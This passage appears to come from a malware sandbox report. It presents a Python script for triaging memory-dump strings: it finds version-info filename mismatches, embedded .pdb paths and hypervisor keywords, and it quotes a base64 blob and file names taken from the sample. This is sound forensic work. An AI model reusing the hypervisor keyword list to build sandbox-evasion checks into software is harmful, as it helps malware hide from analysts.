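The three string-based checks the report applies to memory dumps (version-info OriginalFilename against the on-disk name, embedded .pdb paths, and VM vendor keywords) as an added example that is not code from the report or from Joe Sandbox. It extracts ASCII and UTF-16LE strings from a byte buffer standing in for a process dump (constructed here, reusing strings quoted in this report), reads OriginalFilename the way VS_VERSIONINFO lays it out (UTF-16LE key, NUL terminator, padding to a 4-byte boundary, then the value; the entry's wLength/wValueLength/wType header is omitted), and matches VM keywords on word boundaries so that base64-looking blobs like the two quoted above do not match while strings such as "VMware" and the Hyper-V messages do.

```python
"""Triage version-info, PDB and VM-vendor strings from a memory dump buffer.

Added example, not Joe Sandbox or report code. The buffer is constructed
(reusing strings quoted in the report) and omits the VS_VERSIONINFO
wLength/wValueLength/wType header; only the key/value layout matters here.
"""
import re

ASCII_RE = re.compile(rb"[\x20-\x7e]{6,}")
UTF16_RE = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")
# A VS_VERSIONINFO String entry is: UTF-16LE key, NUL terminator, padding to a
# 4-byte boundary, then the UTF-16LE value. Capture the value after the key.
ORIGINAL_FILENAME_RE = re.compile(
    re.escape("OriginalFilename".encode("utf-16-le")) + rb"(?:\x00\x00)+((?:[\x20-\x7e]\x00)+)"
)
PDB_RE = re.compile(r"[\w\\:.\- ]+\.pdb", re.IGNORECASE)
# Word boundaries keep "XEN" inside a base64 blob from matching "xen".
VM_RE = re.compile(r"\b(vmware|virtualbox|vbox|vboxguest|qemu|xen|hyper-v|vmci)\b", re.IGNORECASE)


def extract_strings(buf: bytes) -> list:
    """ASCII strings followed by UTF-16LE strings, each at least 6 characters."""
    ascii_strings = [m.group().decode("ascii") for m in ASCII_RE.finditer(buf)]
    wide_strings = [m.group().decode("utf-16-le") for m in UTF16_RE.finditer(buf)]
    return ascii_strings + wide_strings


def original_filenames(buf: bytes) -> list:
    return [m.group(1).decode("utf-16-le") for m in ORIGINAL_FILENAME_RE.finditer(buf)]


def filename_mismatches(buf: bytes, on_disk_name: str) -> list:
    """OriginalFilename values that do not match the file name on disk."""
    return [n for n in original_filenames(buf) if n.lower() != on_disk_name.lower()]


def pdb_paths(strings) -> list:
    """Distinct .pdb paths; trailing junk such as 'UGP' or 'GCTL' is dropped."""
    return sorted({m.group() for s in strings for m in PDB_RE.finditer(s)})


def vm_artifacts(strings) -> list:
    """(matched keyword, full string) for every string naming a hypervisor."""
    hits = []
    for s in strings:
        m = VM_RE.search(s)
        if m:
            hits.append((m.group(1), s))
    return hits


def versioninfo_entry(key: str, value: str) -> bytes:
    """Lay out a VS_VERSIONINFO String body: key, NUL, DWORD padding, value, NUL."""
    k = key.encode("utf-16-le") + b"\x00\x00"
    k += b"\x00" * (-len(k) % 4)
    return k + value.encode("utf-16-le") + b"\x00\x00"


# Constructed buffer; the blob is one of the strings the report quotes.
BASE64_BLOB = b"01lXXnOEvEHTYeOrs3hGfs4waIYQPAlFaQOCvi6ewWunD2FaSpwFefR1UvSFd0GKq7C6cTAXF8SH0XrfL8k6xDYxx4Q+GjACxSCw3OePvIU77FyXENgPYQqlZnxb1jTMpUD4FAwv3nKCe/3LSahplmkThDkmhhV0ZyDAMCatySM0Q0v6b3UDO7j4UzOaV517j+2bgoohPh9j8rkMayq3185WcNDENX6VQZQnzNpZQvPWuiXqROn/DlSYCVP8Yoay0yFK"
SEP = b"\x00" * 4  # zero gaps so adjacent strings do not run together
DUMP = SEP.join([
    versioninfo_entry("OriginalFilename", "Suihzn.exe"),
    b"wntdll.pdbUGP",
    b"cmmon32.pdbGCTL",
    BASE64_BLOB,
    b"VMware",
    "A Virtual Machine could not be started because Hyper-V is not installed.".encode("utf-16-le"),
]) + SEP

if __name__ == "__main__":
    strings = extract_strings(DUMP)
    print("OriginalFilename mismatches:", filename_mismatches(DUMP, "Scan_Doc_11052020.exe"))
    print("PDB paths:", pdb_paths(strings))
    for keyword, s in vm_artifacts(strings):
        print(f"VM artifact {keyword!r} in: {s[:60]}")
```

When applied to a real dump, keep the source process of each hit alongside the string, as the report does: a Hyper-V message found in explorer.exe is Windows' own text, whereas the same keyword inside a region written by the sample is evidence.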
 Queries a list of all running processes